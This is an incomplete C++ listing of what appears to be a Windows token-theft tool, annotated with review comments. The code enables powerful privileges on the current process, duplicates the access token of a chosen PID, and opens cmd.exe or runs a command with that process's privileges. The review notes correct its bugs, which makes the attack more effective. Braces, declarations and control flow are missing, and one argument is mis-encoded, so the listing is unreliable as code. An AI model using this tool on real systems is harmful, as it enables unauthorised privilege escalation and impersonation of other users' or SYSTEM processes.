cout << "(-) Ex.: " << name << " <PID> :: for open cmd.exe with new privilages.\n";
cout << "(-) Ex.: " << name << " <PID> \"<command>\" :: for execute command by priveleges of requested PID.\n";
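/*
 * SetPrivilege - enable or disable one named privilege on an access token.
 *
 * hToken            token opened with at least TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
 * lpszPrivilege     privilege name (e.g. "SeDebugPrivilege")
 * bEnablePrivilege  TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it
 *
 * Returns TRUE only when the privilege is now in the requested state. Returns
 * FALSE, after printing the Win32 error, when the name cannot be resolved,
 * when AdjustTokenPrivileges fails, or when the token does not hold the
 * privilege at all (ERROR_NOT_ALL_ASSIGNED). Enabling can only flip a
 * privilege that is already present-but-disabled on the token; it cannot
 * add one the token was never granted, so the caller must treat FALSE as
 * "this token cannot do what was asked".
 */
BOOL SetPrivilege(HANDLE hToken,          // access token handle
                  LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
                  BOOL bEnablePrivilege)  // TRUE = enable, FALSE = disable
{
    LUID luid;
    if (!LookupPrivilegeValue(NULL,          // lookup privilege on local system
                              lpszPrivilege, // privilege to lookup
                              &luid)) {      // receives LUID of privilege
        printf("\t(-) LookupPrivilegeValue error: %u\n", GetLastError());
        return FALSE;
    }

    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    // The original listing assigned Attributes twice in a row (SE_PRIVILEGE_ENABLED
    // and then 0), so every call ended up disabling the privilege no matter what
    // bEnablePrivilege said. Select the attribute from the flag instead.
    tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;

    BOOL adjusted = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES),
                                          (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL);
    // Read the error code before any output call can overwrite it. AdjustTokenPrivileges
    // returns TRUE but sets ERROR_NOT_ALL_ASSIGNED when the token lacks the privilege,
    // which is the case the caller most needs to see.
    DWORD err = GetLastError();
    if (!adjusted) {
        printf("\t(-) AdjustTokenPrivileges error: %u\n", err);
        return FALSE;
    }
    if (err == ERROR_NOT_ALL_ASSIGNED) {
        printf("\t(-) The token does not have the specified privilege. ");
        return FALSE;
    }
    return TRUE;
}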
// NOTE(review): the signature of the function enclosing these lines is not in
// view, and neither are the declarations of fhToken, fLuid, privs and bResult.
// What follows reads as a pre-flight check that the current process already
// holds SeAssignPrimaryTokenPrivilege and SeTcbPrivilege.
// The return value of OpenProcessToken is ignored: on failure fhToken is left
// unset and PrivilegeCheck below runs against a garbage handle. TOKEN_ALL_ACCESS
// is also far more than PrivilegeCheck needs (TOKEN_QUERY is enough).
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &fhToken);
// Wide string literals stored through non-const wchar_t* (deprecated conversion);
// the (LPCTSTR) cast on the call below is only type-correct in a UNICODE build.
wchar_t *cPrivs[] = { L"SeAssignPrimaryTokenPrivilege", L"SeTcbPrivilege" };
for (int i = 0; i < 2; i++)
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
(LPCTSTR)cPrivs[i], // privilege to lookup
&fLuid)) // receives LUID of privilege
printf("LookupPrivilegeValue error: %u\n", GetLastError());
// One-entry PRIVILEGE_SET. With PRIVILEGE_SET_ALL_NECESSARY the check passes only
// when every listed privilege is enabled on fhToken (the input Attributes value is
// not what decides this; PrivilegeCheck reports enabled-ness via bResult).
privs.PrivilegeCount = 1;
privs.Control = PRIVILEGE_SET_ALL_NECESSARY;
privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED;
privs.Privilege[0].Luid = fLuid;
// PrivilegeCheck's own BOOL return (API failure) is ignored, and no test of
// bResult is visible before the "doesn't have" message below - presumably an
// `if (!bResult)` was lost from this listing; confirm against the full file.
PrivilegeCheck(fhToken, &privs, &bResult);
wprintf(L"\t(-) The process dosn't have the %s\n\n", cPrivs[i]);
/*
 * main - token-theft helper: enables a list of privileges on the caller's own
 * token, opens the target PID, duplicates its token as a primary token and
 * spawns cmd.exe under it with CreateProcessWithTokenW.
 *
 * argv[1]  target PID (decimal)
 * argv[2]  optional command, run as "cmd.exe /c <command>" (see the usage text)
 *
 * NOTE(review): this listing is incomplete. Braces, return statements and the
 * declarations of NewTokens, hPrimaryToken, si, pi, cmd, command and flag are
 * not in view, so the control flow between the messages below is inferred.
 */
int main(int argc, char *argv[])
// Exactly one or two arguments are accepted; what runs in this branch (usage
// text, exit code) is not in view.
if (argc <= 1 || argc >= 4)
// atoi() gives no error signal: "abc" or "0x10" silently becomes PID 0, which
// OpenProcess then rejects with a misleading error. strtoul() with an end-pointer
// check would reject bad input up front.
DWORD pid = atoi(argv[1]);
cout << "\n[***] Starting the migrate functionality, requested PID => " << pid << " [***]\n";
cout << "(!) Check if the process have an required permissions...\n";
cout << "(!) Trying to set the necessary privileges.\n";
HANDLE currentProcessToken;
// BUG: "¤t" is a mis-encoded "&curr" (the HTML entity &curren;); the argument must
// read &currentProcessToken. The return value is also unchecked, and TOKEN_ALL_ACCESS
// is more than AdjustTokenPrivileges needs (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY).
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, ¤tProcessToken);
// Privileges to enable on our own token before touching the target. Enabling only
// works for privileges the token already holds in a disabled state; a privilege
// the token was never granted cannot be added here, and SetPrivilege reports that
// as a failure.
wchar_t *privs[9] = {L"SeAssignPrimaryTokenPrivilege", L"SeTcbPrivilege", L"SeCreateGlobalPrivilege", L"SeDebugPrivilege", L"SeImpersonatePrivilege", L"SeIncreaseQuotaPrivilege", L"SeProfileSingleProcessPrivilege", L"SeSecurityPrivilege", L"SeSystemEnvironmentPrivilege"};
for (int i = 0; i < 9; i++)
// SetPrivilege takes LPCTSTR; passing wchar_t* only type-checks in a UNICODE build.
if (!SetPrivilege(currentProcessToken, privs[i], true))
wprintf(L"Access denied to set %s \n", privs[i]);
// Presumably the abort path - the return/exit that should follow is not in view.
cout << "\t(-) You does not have the specified privilege. Migration aborted.\n";
cout << "\t(+) All required Permissions was successfull granted.\n\n";
cout << "(!) Trying to open Handel for requested PID.\n";
// PROCESS_ALL_ACCESS is excessive for what follows: OpenProcessToken only needs
// PROCESS_QUERY_INFORMATION (PROCESS_QUERY_LIMITED_INFORMATION on current Windows).
// Requesting more rights than needed can make the open fail where a narrower
// request would succeed. hProcess is never closed anywhere in view.
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
// Failure message; the hProcess == NULL test that should guard it is not in view.
cout << "\t(-) Can not open handle for requested PID";
cout << "\t(+) The HANDLE was created success.\n\n";
cout << "(!) Try to Duplicte existen tokens of the requested PID " << pid << "\n";
// DuplicateTokenEx needs only TOKEN_DUPLICATE on the source token; asking for
// TOKEN_ALL_ACCESS is refused on any token whose DACL grants us less than that.
if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &NewTokens))
cout << "\t(-) Denied to handle Process Tokens\n";
cout << "\t(+) Extracting tokens was successfull\n";
// Copies the token as a primary token (CreateProcessWithTokenW requires one);
// MAXIMUM_ALLOWED takes whatever rights the DACL allows. The impersonation level
// is irrelevant for a primary token but harmless.
if (!DuplicateTokenEx(NewTokens, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hPrimaryToken))
cout << "\t(-) Denied to Duplicate process Tokens\n";
cout << "\t(+) Duplicate tokens was successfull\n\n";
cout << "(!) Try to execute new process with duplicated tokens.\n";
// No `si.cb = sizeof(si)` is visible after the ZeroMemory. CreateProcess* reads cb
// to identify the structure version, so it must be set; if that line was merely
// lost from this listing, confirm it is present. si must be STARTUPINFOW here.
ZeroMemory(&si, sizeof(si));
si.lpDesktop = L"WinSta0\\Default"; //window station and desktop of interactive user
ZeroMemory(&pi, sizeof(pi));
// Builds "cmd.exe /c <command>" from the narrow argv string (%hs). If command is
// NULL (PID-only invocation per the usage text) this is undefined behaviour; the
// no-command path should format plain L"cmd.exe" instead. The size of cmd is not
// in view; on overflow swprintf_s calls the invalid-parameter handler. <command>
// is handed to the shell verbatim - acceptable for an operator-driven tool, but
// never route attacker-controlled text through here.
swprintf_s(cmd, L"cmd.exe /c %hs", command);
// 0x00000001 is LOGON_WITH_PROFILE - use the named constant. Per the API contract
// the caller needs SeImpersonatePrivilege for this call, the token must be primary
// (it is), and the command line must be a writable buffer (cmd is one) because the
// callee may modify it. `flag` (dwCreationFlags) is declared outside this view.
if (!CreateProcessWithTokenW(hPrimaryToken, 0x00000001, NULL, (LPWSTR)cmd, flag, NULL, NULL, &si, &pi))
// BUG: the cout below runs before GetLastError() is read on the next line, and a
// console write can overwrite the thread's last-error value. Capture GetLastError()
// into a DWORD immediately after the failed call and print that instead.
cout << "\t(-) Somthing went wrong!!! \n\t";
printf(" -Can't create new process with Extracted tokens, got error: %u\n", GetLastError());
cout << "[***] We successfuly Migrated to requested PID. [***]\n";
// Handle hygiene: pi.hProcess, pi.hThread, hProcess, NewTokens and hPrimaryToken
// are never closed anywhere in view.
cout << "[***] The CMD console with new privilages was opened. [***]\n";
cout << "[***] Command was executed succesfully!!! [***]";